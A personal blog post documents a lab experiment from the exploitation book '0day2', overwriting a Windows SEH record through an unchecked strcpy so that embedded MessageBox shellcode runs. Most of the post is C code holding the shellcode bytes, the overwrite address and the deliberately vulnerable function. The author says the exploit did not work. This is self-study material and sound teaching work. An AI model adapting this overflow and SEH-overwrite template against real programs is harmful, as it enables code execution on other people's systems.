Revisiting an old book: 0day2 [8] Experiment on sniping Windows exception handling


    Now on to chapter 6 of 0day2.

    I photographed the book's chapter 6 pages and put them in my QQ space (cnblogs uploads one image at a time, which is too slow): http://user.qzone.qq.com/252738331/photo/V10U5YUk464GF5/   password NQK3S

    Enough talk, here is the code.

    // 0day2_8.cpp : Defines the entry point for the console application.
    //

    #include "stdafx.h"
    #include <windows.h>
    #include <stdio.h>
    //    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    char shellcode[] = {
        // NOP sled, then int 3 breakpoints, followed by the book's MessageBox shellcode
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xcc\xcc\xcc\xcc"
        "\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C\x8B\xF4\x8D\x7E\x0C\x33"
        "\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30"
        "\x8B\x4B\x0C\x8B\x49\x1C\x57\x56\x8B\x69\x08\x8B\x79\x20\x8B\x09\x66\x39\x57\x18\x75\xF2"
        "\x5E\x5F\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05"
        "\x78\x03\xCD\x8B\x59\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A\xC4"
        "\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75\xE4\x8B\x59\x24\x03\xDD\x66"
        "\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75"
        "\xA9\x33\xDB\x53\x68\x61\x61\x61\x61\x68\x62\x62\x62\x62\x8B\xC4\x53\x50\x50\x53\xFF\x57"
        "\xFC\x53\xFF\x57\xF8"

        // padding up to the SEH record, then the address written over the handler pointer
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x9c\xfe\x12\x00"
    };

    DWORD MyExceptionHandler(void)
    {
        printf("got an exception,press enter to kill process!\n");
        getchar();
        ExitProcess(1);
        return 0;
    }

    void Test(char * input)
    {
        char buf[200];
        int zero = 0;
        //__asm int 3
        //printf("len %d \n",strlen(shellcode));
        //_asm int 3
        __try
        {
            strcpy(buf,input);      // unchecked copy: overruns buf and the SEH record above it

            zero=4/zero;            // divide by zero raises the exception that invokes the handler
        }
        __except(MyExceptionHandler()){}
    }

    int main(int argc, char* argv[])
    {
        /*_asm{

        lea eax,dword ptr shellcode
        call eax
        }*/
        Test(shellcode);
        return 0;
    }

    This experiment took me a long time to do and a long time to fiddle with, and in the end our lovely msg just would not pop up, which dented my enthusiasm, so I shelved it for a long time!

    ----------------------------------------------------

    | QQ 252738331

    | QQ group: 104132152 (group name: buffer overflow|assembly|reverse engineering)

    | Weibo: http://t.qq.com/zhenw0

    ----------------------------------------------------

    Original post: https://www.cnblogs.com/witty/p/0day2_8.html